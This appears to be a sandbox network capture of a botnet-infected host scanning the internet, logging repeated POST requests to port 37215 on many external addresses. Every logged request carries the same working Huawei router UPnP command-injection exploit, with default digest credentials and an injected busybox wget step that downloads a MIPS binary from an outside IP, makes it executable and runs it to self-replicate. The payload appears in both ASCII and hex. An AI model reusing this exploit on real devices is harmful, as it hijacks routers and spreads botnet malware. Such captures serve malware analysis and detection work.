                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1486192.168.2.235368041.150.91.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475599051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1487192.168.2.2353614157.240.24.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475606918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1488192.168.2.2344734197.7.190.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475620985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1489192.168.2.233959865.171.220.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475708961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1490192.168.2.2348550157.4.97.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475713968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1491192.168.2.2336798197.196.119.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475718021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1492192.168.2.2359732157.119.134.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475734949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1493192.168.2.2341722197.41.135.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475734949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1494192.168.2.2352226157.66.146.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475744963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1495192.168.2.2348750197.236.225.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475760937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1496192.168.2.234837841.69.112.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.475764036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
